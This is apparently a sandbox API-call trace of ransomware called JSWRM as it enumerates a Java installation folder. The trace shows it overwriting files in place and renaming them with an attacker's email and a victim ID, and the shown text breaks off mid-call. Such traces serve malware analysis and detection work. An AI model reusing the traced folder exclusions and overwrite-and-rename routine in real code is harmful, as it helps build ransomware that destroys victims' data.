[0069.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0069.923] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa10e432c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x20555a13, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName=".", cAlternateFileName="")) returned 0x231b00 [0069.924] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.924] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa10e432c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x20555a13, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="..", cAlternateFileName="")) returned 1 [0069.924] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.924] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.924] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x374c, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="ffjcext.zip", cAlternateFileName="")) returned 1 [0069.924] lstrcmpiW (lpString1="ffjcext.zip", lpString2=".") returned 1 [0069.924] lstrcmpiW (lpString1="ffjcext.zip", lpString2="..") returned 1 [0069.924] lstrcmpiW (lpString1="ffjcext.zip", lpString2="...") returned 1 [0069.924] lstrcmpiW (lpString1="ffjcext.zip", lpString2="windows") returned -1 [0069.924] lstrcmpiW (lpString1="ffjcext.zip", lpString2="recovery") returned -1 [0069.924] lstrcmpiW (lpString1="ffjcext.zip", lpString2="perflogs") returned -1 [0069.924] lstrcmpiW (lpString1="ffjcext.zip", lpString2="documents and settings") returned 1 [0069.924] lstrcmpiW (lpString1="ffjcext.zip", lpString2="$RECYCLE.BIN") returned 1 [0069.924] lstrcmpiW (lpString1="ffjcext.zip", lpString2="system volume information") returned -1 [0069.924] lstrcmpiW (lpString1="ffjcext.zip", lpString2="msocache") returned -1 [0069.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0069.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ffjcext.zip", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ffjcext.zip", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ffjcext.zip", lpUsedDefaultChar=0x0) returned 11 [0069.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0069.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0069.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ffjcext.zip", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ffjcext.zip", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ffjcext.zip", lpUsedDefaultChar=0x0) returned 11 [0069.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0069.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0069.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0069.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0069.924] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0069.925] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14156) returned 1 [0069.925] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3740) returned 0x24e1e0 [0069.925] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x3740, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x3740, lpOverlapped=0x0) returned 1 [0069.927] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.927] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x3740, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x3740, lpOverlapped=0x0) returned 1 [0069.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.927] CloseHandle (hObject=0x458) returned 1 [0069.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0069.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0069.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0069.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0069.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0069.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f5f8 [0069.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.928] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0069.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0069.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0069.929] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20555a13, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x20555a13, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x2057ba55, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.929] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.929] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.929] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.929] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.929] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.929] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.929] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.929] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.929] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.929] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0069.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0069.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0069.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0069.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0069.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0069.929] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xb2c, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="messages.properties", cAlternateFileName="MESSAG~1.PRO")) returned 1 [0069.930] lstrcmpiW (lpString1="messages.properties", lpString2=".") returned 1 [0069.930] lstrcmpiW (lpString1="messages.properties", lpString2="..") returned 1 [0069.930] lstrcmpiW (lpString1="messages.properties", lpString2="...") returned 1 [0069.930] lstrcmpiW (lpString1="messages.properties", lpString2="windows") returned -1 [0069.930] lstrcmpiW (lpString1="messages.properties", lpString2="recovery") returned -1 [0069.930] lstrcmpiW (lpString1="messages.properties", lpString2="perflogs") returned -1 [0069.930] lstrcmpiW (lpString1="messages.properties", lpString2="documents and settings") returned 1 [0069.930] lstrcmpiW (lpString1="messages.properties", lpString2="$RECYCLE.BIN") returned 1 [0069.930] lstrcmpiW (lpString1="messages.properties", lpString2="system volume information") returned -1 [0069.930] lstrcmpiW (lpString1="messages.properties", lpString2="msocache") returned -1 [0069.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.properties", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0069.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0069.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.properties", cchWideChar=19, lpMultiByteStr=0x2413d0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.properties", lpUsedDefaultChar=0x0) returned 19 [0069.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.properties", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0069.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.properties", cchWideChar=19, lpMultiByteStr=0x2410d8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.properties", lpUsedDefaultChar=0x0) returned 19 [0069.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0069.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.930] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0069.930] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2860) returned 1 [0069.930] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb20) returned 0x24e1e0 [0069.931] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0xb20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0xb20, lpOverlapped=0x0) returned 1 [0069.932] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.932] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0xb20, lpOverlapped=0x0) returned 1 [0069.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.932] CloseHandle (hObject=0x458) returned 1 [0069.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0069.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0069.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0069.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0069.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0069.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0069.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.933] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0069.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0069.933] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xcea, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="messages_de.properties", cAlternateFileName="MESSAG~2.PRO")) returned 1 [0069.933] lstrcmpiW (lpString1="messages_de.properties", lpString2=".") returned 1 [0069.933] lstrcmpiW (lpString1="messages_de.properties", lpString2="..") returned 1 [0069.933] lstrcmpiW (lpString1="messages_de.properties", lpString2="...") returned 1 [0069.934] lstrcmpiW (lpString1="messages_de.properties", lpString2="windows") returned -1 [0069.934] lstrcmpiW (lpString1="messages_de.properties", lpString2="recovery") returned -1 [0069.934] lstrcmpiW (lpString1="messages_de.properties", lpString2="perflogs") returned -1 [0069.934] lstrcmpiW (lpString1="messages_de.properties", lpString2="documents and settings") returned 1 [0069.934] lstrcmpiW (lpString1="messages_de.properties", lpString2="$RECYCLE.BIN") returned 1 [0069.934] lstrcmpiW (lpString1="messages_de.properties", lpString2="system volume information") returned -1 [0069.934] lstrcmpiW (lpString1="messages_de.properties", lpString2="msocache") returned -1 [0069.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_de.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0069.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0069.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_de.properties", cchWideChar=22, lpMultiByteStr=0x241038, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_de.properties", lpUsedDefaultChar=0x0) returned 22 [0069.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_de.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0069.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0069.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_de.properties", cchWideChar=22, lpMultiByteStr=0x241060, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_de.properties", lpUsedDefaultChar=0x0) returned 22 [0069.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.934] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 